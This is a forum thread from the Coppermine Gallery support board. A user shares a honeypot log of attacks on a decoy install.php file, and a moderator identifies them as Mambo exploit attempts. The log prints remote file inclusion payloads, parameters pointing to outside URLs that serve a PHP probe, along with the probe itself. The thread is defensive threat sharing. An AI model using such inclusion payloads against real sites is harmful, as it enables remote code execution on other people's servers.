Attack to CPG 1.4.x target "install.php" Attack to CPG 1.4.x target "install.php"
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Attack to CPG 1.4.x target "install.php"

Started by brix, August 27, 2010, 10:45:57 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

brix

Hi all,

I know that after installation you must delete "install.php" for any CMS but often that does not happen.

One of our users (an Italian website) has recently been attacks on the file "install.php" so I suggested to remove it.

He did and one of his staff created a false "install.php" bait running log of attempts to hack.

I hope it will be useful to know which attack is executed, and for that reason I Paste the contents of the log created bait:
Quote
Log:

Sunday 15th of August 2010 09:09:59 AM - 146.83.237.120 - Mozilla/5.0 - mosConfig_absolute_path=http://www.songdosarang.org/skin/head??
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error=http://devilbat.fileave.com/zfxid1.txt?

Comment:

Caught!
It seems that finally the fish has the bait!
On the day of August there were a couple of intrusion attempts, the result is these two lines:
Sunday 15th of August 2010 9:09:59 AM - 146.83.237.120 - Mozilla/5.0 - http://www.songdosarang.org/skin/head mosConfig_absolute_path =?
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error = http://devilbat.fileave.com/zfxid1.txt?

The first IP is from Chile, the university network and the second by a U.S. hosting service, probably in both cases it is a botnet and the owners of IP are unaware and innocent.

Both attacks link to a URL in the parameters passed to the installer of Coppermine by visiting the url you get (as expected) the string php who wanted to inject this site:
<? Php / * * ZFxID / echo ("Shiro". "Hige") die ("Shiro". "Hige") / * * ZFxID /?>

If this thread is somewhat useful, I was pleased to collaborate in the protection of Coppermine, with the help of our users. Thanks

brix

sorry I pushed the button "solved" but is not :-(

Nibbler

That's a mambo exploit attempt. It won't do anything to Coppermine.